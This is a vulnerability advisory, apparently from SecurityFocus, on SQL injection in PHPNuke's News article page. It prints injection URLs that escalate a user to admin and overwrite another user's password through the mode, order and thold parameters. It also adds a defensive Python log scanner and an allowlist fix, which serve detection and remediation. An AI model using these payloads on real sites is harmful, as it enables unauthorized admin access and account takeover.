PHPNuke News Module Article.PHP SQL Injection Vulnerability

The following exploit information was provided by Frog Man <leseulfrog@hotmail.com>:

If magic_quotes_gpc=OFF:

Change our level (into admin):
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4

or

http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4


Change the user Bob's password:
http://www.example.com/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*
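
Added example, not part of the original advisory or of PHPNuke: a Python check that reviews web access logs for requests to the News article page where save is set and mode, order or thold carries unexpected characters. It assumes combined-format log lines and that legitimate values of those three parameters are short alphanumeric tokens or small signed integers; the log lines and names below are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows carrying injected SQL when save=1 is set.
WATCHED = ("mode", "order", "thold")
# Assumption: legitimate values are short alphanumeric tokens or signed integers.
SAFE_VALUE = re.compile(r"-?[A-Za-z0-9_]{0,16}")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(url):
    """Return {param: value} for watched parameters with unexpected content."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("modules.php"):
        return {}
    # parse_qs percent-decodes, so %27 and a literal quote are treated alike.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("name", [""])[-1].lower() != "news":
        return {}
    if qs.get("file", [""])[-1].lower() != "article" or "save" not in qs:
        return {}
    return {p: v for p in WATCHED for v in qs.get(p, [])
            if not SAFE_VALUE.fullmatch(v)}


def scan_log(lines):
    """Return [(line_number, findings)] for log lines that need review."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            found = suspicious_params(match.group(1))
            if found:
                hits.append((number, found))
    return hits


# Constructed sample log lines (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /modules.php?name=News&file=article&sid=1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2004:10:00:05 +0000] "GET /modules.php?name=News&file=article&sid=1&save=1&mode=nested&order=0&thold=-1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2004:10:01:00 +0000] "GET /modules.php?name=News&file=article&sid=1&save=1&thold=%27,user_level=%274 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: review {found}")
```

The same allowlist, applied server-side to mode, order and thold before they reach the query, rejects these requests regardless of the magic_quotes_gpc setting.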


 

Copyright 2010, SecurityFocus